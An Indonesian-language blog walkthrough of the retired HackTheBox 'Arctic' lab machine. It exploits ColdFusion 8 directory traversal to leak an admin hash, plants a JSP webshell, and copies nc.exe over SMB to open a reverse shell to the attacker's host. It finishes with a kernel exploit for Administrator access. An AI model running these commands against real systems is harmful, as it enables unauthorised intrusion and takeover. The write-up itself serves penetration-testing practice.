Open in app

Sign in

Write

Sign in

HACKTHEBOX WALKTROUGH

Arctic Machine

CVE 2010–2861 (Without Metasploit)

Dimas Kusuma
4 min readJan 5, 2021

--

Trimakasih sudah meluangkan waktu untuk membaca artikel ini. Saat ini penulis menghadapi mesin retired HTB “Arctic” yang dimana total ada 72 mesin retired setelah penulis memperbarui list target penulis yang terdapat pada list netsecfocus, dan penulis akan menempuh list target tersebut dan di dokumentasikan di akun medium ini.

Semoga pembaca semakin diberkahi dan ditingkatkan keilmuannya, serta selalu tercapai setiap tujuan dan cita-citanya atas Kehendak-Nya, juga yang sedang menempuh sertifikasi OSCP semoga tercapai dan sukses total, Aamiin. Full list mesin retired HTB oleh netsecfocus dapat di akses disini.

Reconnaissance

Dimulai dengan melakukan reconnaissance menggunakan nmap.

PORT      STATE SERVICE                                                                                                                       
135/tcp   open  msrpc                                                                                                                         
8500/tcp  open  fmtp                                                                                                                          
49154/tcp open  unknown

Diketahui adanya 3(tiga) port terbuka berdasarkan hasil recon dengan nmap.

Enumeration

Kemudian penulis melakukan akses terhadap url http://10.10.10.11:8500 via firefox browser.

Gambar 1
Gambar 2

Berdasarkan Gambar 2, didapatkan informasi bahwa terdapat adobe coldfusion 8 pada server target.

Kemudian penulis melakukan pencarian exploit pada searchsploit berdasarkan informasi yang penulis dapatkan di Gambar 2, yaitu adobe coldfusion 8.

Gambar 3

Terdapat beberapa exploit yang dapat penulis gunakan, namun penulis memutuskan untuk menggunakan exploit “Adobe Coldfusion — Directory Traversal”.

# python 14641.py 10.10.10.11 8500 ../../../../../../../lib/password.properties
Gambar 4

Setelah penulis menjalankan exploit “Adobe Coldfusion — Directory Traversal” pada ip address 10.10.10.11 dan port 8500, maka penulis berhasil mendapatkan credentials yaitu :

password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

Kemudian credentials yang sudah didapatkan oleh penulis di crack melalui situs :

https://sha1.gromweb.com/?hash=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
Gambar 5

Diketahui pada credentials yang sudah di dekripsi adalah “happyday”.

Kemudian penulis hanya perlu melakukan login menggunakan user ‘admin’ dan password ‘happyday’ pada adobe coldfusion yang terdapat pada server target.

Gambar 6

Setelah sudah berhasil login, penulis memilih server settings kemudian mappings yang nantinya penulis akan melakukan schedule task.

http://10.10.10.11:8500/CFIDE/administrator/settings/mappings.cfm
Gambar 7

Lalu penulis membuat schedule task untuk melakukan download cmdjsp.jsp yang terdapat pada localhost penulis.

http://10.10.10.11:8500/CFIDE/administrator/index.cfm
Gambar 8

Maka setelah itu penulis mendapatkan akses shell melalui webshell yang dapat penulis akses melalui browser.

http://10.10.10.11:8500/CFIDE/administrator/cmdjsp.jsp
Gambar 9

Initial Shell

Sebenarnya penulis sudah mendapatkan initial user, tapi shell is better. Penulis menggunakan ncat untuk melakukan reverse shell antara server target dan localhost penulis.

Penulis memindahkan nc.exe yang terdapat pada localhost penulis menuju server target menggunakan smb server python.

# smbserverpython-kcrt
Gambar 10
http://10.10.10.11:8500/CFIDE/administrator/cmdjsp.jsp?cmd=copy+%5C%5C10.10.14.4%5Ckcrt%5Cnc.exe+C%3A%5CWindows%5CTemp%5Cnc.exe
Gambar 11

Setelah nc.exe sudah berhasil dipindahkan oleh penulis menuju server target, penulis hanya perlu melakukan reverse shell melalui port 999 yang sebelumnya sudah dijadikan listener di localhost.

C:\Windows\Temp\nc.exe 10.10.14.4 999 -e cmd
Gambar 12

Setelah itu penulis mendapatkan Initial Shell menggunakan ncat.

# nc -lvvp 999
Gambar 13

Privilege Escalation

Penulis melakukan privilege escalation menggunakan windows kernel exploit.

systeminfo
Gambar 14

Kemudian penulis menyimpan result dari systeminfo kedalam file Arctic.txt, yang kemudian penulis menjalankan windows exploit suggester untuk melakukan pencarian terhadap beberapa kemungkinan untuk penggunaan windows kernel exploit.

# python windows-exploit-suggester.py --database 2020-10-19-mssb.xls --systeminfo Arctic.txt
Gambar 15

Seperti yang terlihat di Gambar 15, penulis mengetahui bahwa sistem operasi target memiliki vulnerability terhadap beberapa kemungkinan untuk dijalankan kernel exploit. Kemudian penulis memilih untuk menggunakan MS10–059 untuk kernel exploit.

Gambar 16

Penulis berhasil mendapatkan sesi Administrator.

Kesimpulan

  1. Langkah penulis untuk mendapatkan initial foothold menggunakan kerentanan terhadap aplikasi yang sudah out of dated, sehingga exploitation tools nya sudah terdapat pada exploit-db.
  2. Dikarenakan sistem operasi windows yang digunakan pada target masih versi lama, maka penulis dapat melakukan kernel exploit pada MS10–059.
  3. Sebetulnya pada mesin ini tidak ada tantangan khusus, hanya saja penulis lebih tersadarkan bahwa sebetulnya beberapa sistem yang sudah dijalankan terdapat exploit yang sudah di bagikan di exploit-db walaupun tidak untuk versi aplikasi yang terbaru.

Target

48 Mesin lagi !

--

--

Dimas Kusuma

Written by Dimas Kusuma

6 Followers

limitations only in our mind

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams